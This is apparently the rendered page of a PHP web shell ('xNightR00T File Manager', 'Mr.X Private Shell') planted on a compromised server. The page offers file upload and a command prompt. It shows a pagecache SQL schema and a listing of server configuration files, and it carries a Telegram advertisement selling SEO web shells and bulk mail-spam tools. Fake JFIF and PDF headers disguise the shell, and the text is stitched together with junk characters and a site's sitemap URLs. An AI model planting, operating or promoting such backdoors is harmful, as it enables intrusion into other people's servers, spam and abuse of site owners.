xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
CREATE TABLE if not exists pagecache_stats_daily ( 
    id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT, 
    entry_type_id      integer, 
    rule_id            integer,
    app_id             integer, 
    counter_value      float, 
    from_time          integer, 
    until_time         integer
);
CREATE UNIQUE INDEX IF NOT EXISTS pagecache_stats_daily_idx1 on pagecache_stats_daily (entry_type_id,rule_id,app_id,from_time);
CREATE INDEX IF NOT EXISTS pagecache_stats_daily_idx2 on pagecache_stats_daily (until_time);

CREATE TABLE if not exists pagecache_stats_weekly ( 
    id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT, 
    entry_type_id      integer, 
    rule_id            integer,
    app_id             integer, 
    counter_value      float, 
    from_time          integer, 
    until_time         integer
);
CREATE UNIQUE INDEX IF NOT EXISTS pagecache_stats_weekly_idx1 on pagecache_stats_weekly (entry_type_id,rule_id,app_id,from_time);
CREATE INDEX IF NOT EXISTS pagecache_stats_weekly_idx2 on pagecache_stats_weekly (until_time);

CREATE TABLE if not exists pagecache_stats_monthly ( 
    id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT, 
    entry_type_id      integer, 
    rule_id            integer,
    app_id             integer, 
    counter_value      float, 
    from_time          integer, 
    until_time         integer
);
CREATE UNIQUE INDEX IF NOT EXISTS pagecache_stats_monthly_idx1 on pagecache_stats_monthly (entry_type_id,rule_id,app_id,from_time);
CREATE INDEX IF NOT EXISTS pagecache_stats_monthly_idx2 on pagecache_stats_monthly (until_time);

CREATE TABLE if not exists pagecache_stats_properties ( 
    id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT, 
    first_time_updated integer, 
    app_id             integer,
    rule_id            integer
);
CREATE UNIQUE INDEX IF NOT EXISTS pagecache_stats_properties_idx1 on pagecache_stats_properties(app_id,rule_id);

CREATE TABLE if not exists pagecache_time_saved (
    id INTEGER  NOT NULL PRIMARY KEY AUTOINCREMENT, 
    rule_id integer,
    specific_key       varchar(128),
    time_saved         integer
);
CREATE UNIQUE INDEX IF NOT EXISTS pagecache_time_saved_idx1 on pagecache_time_saved(rule_id, specific_key);

CREATE TABLE if not exists pagecache_metadata ( 
    property_name text,
    property_value integer,
    last_updated integer,
    node_id integer
);
CREATE UNIQUE INDEX IF NOT EXISTS pagecache_metadata_idx1 on pagecache_metadata(property_name, node_id);

CREATE TABLE IF NOT EXISTS pagecache_schema_properties (
    name VARCHAR(256) NOT NULL PRIMARY KEY UNIQUE,
    property_value VARCHAR(256) NOT NULL DEFAULT ""
);

INSERT OR IGNORE INTO pagecache_schema_properties (name, property_value) VALUES ('version', '2018.0.0');

Filemanager

Name Type Size Permission Actions
UserServer Folder 0755
azure-plugins Folder 0755
dist Folder 0755
libraries Folder 0755
minify Folder 0755
plugins Folder 0755
scripts Folder 0755
sdk Folder 0755
selinux Folder 0755
support_tool Folder 0775
zray-cleanup-scripts Folder 0755
zs-cli-tools Folder 0755
alias-linux-apache-2.4-fpm.tpl File 385 B 0644
alias-linux-apache-2.4.tpl File 310 B 0644
alias-nginx-root.tpl File 119 B 0644
alias-nginx.tpl File 112 B 0644
alias-pase-apache-2.4.tpl File 211 B 0644
alias-windows-apache-2.4.tpl File 181 B 0644
alias.tpl File 282 B 0644
browser_mysql_create_database.sql File 2.89 KB 0644
browser_sqlite_create_database.sql File 3.17 KB 0644
create_monitor_db.sql File 5.58 KB 0644
create_monitor_rules_db.sql File 1.37 KB 0644
create_monitor_rules_fixtures.sql File 8.36 KB 0644
create_monitor_tracing_db.sql File 906 B 0644
create_pagecache_rules_db.sql File 1.15 KB 0644
deployment.xsd File 11.33 KB 0644
deployment_mysql_create_database.sql File 6.69 KB 0644
deployment_sqlite_create_database.sql File 7.35 KB 0644
devbar_fixtures.sql File 1.27 KB 0644
devbar_mysql_create_database.sql File 7.6 KB 0644
devbar_sqlite_create_database.sql File 8.59 KB 0644
gui_ibmi_update_database.sql File 268 B 0644
gui_mysql_acl_fixtures.sql File 19 KB 0644
gui_mysql_create_database.sql File 7.29 KB 0644
gui_sqlite_acl_fixtures.sql File 18.34 KB 0644
gui_sqlite_create_database.sql File 7.58 KB 0644
index.php File 18.34 KB 0644
jobqueue_mysql_create_database.sql File 4.8 KB 0644
jobqueue_sqlite_create_database.sql File 4.93 KB 0644
mysql_create_message_center_db.sql File 6.7 KB 0644
mysql_create_monitor_db.sql File 6.64 KB 0644
mysql_create_monitor_rules_db.sql File 1.42 KB 0644
mysql_create_pagecache_rules_db.sql File 1.15 KB 0644
pagecache_purge.sql File 1.51 KB 0644
sqlite_create_message_center_db.sql File 7.28 KB 0644
statistics_mysql_create_database.sql File 4.37 KB 0644
statistics_sqlite_create_database.sql File 4.68 KB 0644
stats_mysql_fixtures.sql File 35.9 KB 0644
stats_sqlite_fixtures.sql File 30.03 KB 0644
statsd_mysql_create_database.sql File 4.59 KB 0644
statsd_sqlite_create_database.sql File 2.61 KB 0644
statsd_sqlite_pagecache_create_database.sql File 2.67 KB 0644
urlinsight_mysql_create_database.sql File 2.58 KB 0644
urlinsight_sqlite_create_database.sql File 2.75 KB 0644
vhost-apache-2.4-fpm.tpl File 832 B 0644
vhost-apache-2.4.tpl File 726 B 0644
vhost-nginx-ssl.tpl File 426 B 0644
vhost-nginx.tpl File 292 B 0644
vhost-pase-apache-2.4.tpl File 480 B 0644
vhost-pase-ssl-apache-2.4.tpl File 536 B 0644
vhost-ssl-apache-2.4-fpm.tpl File 1013 B 0644
vhost-ssl-apache-2.4.tpl File 900 B 0644
vhost-ssl.tpl File 618 B 0644
vhost-windows-ssl-apache-2.4.tpl File 719 B 0644
vhost.tpl File 444 B 0644
zsd_mysql_create_schema.sql File 11.54 KB 0644
zsd_mysql_fixtures.sql File 367 B 0644
zsd_sqlite_create_schema.sql File 11.12 KB 0644
zsd_sqlite_fixtures.sql File 363 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml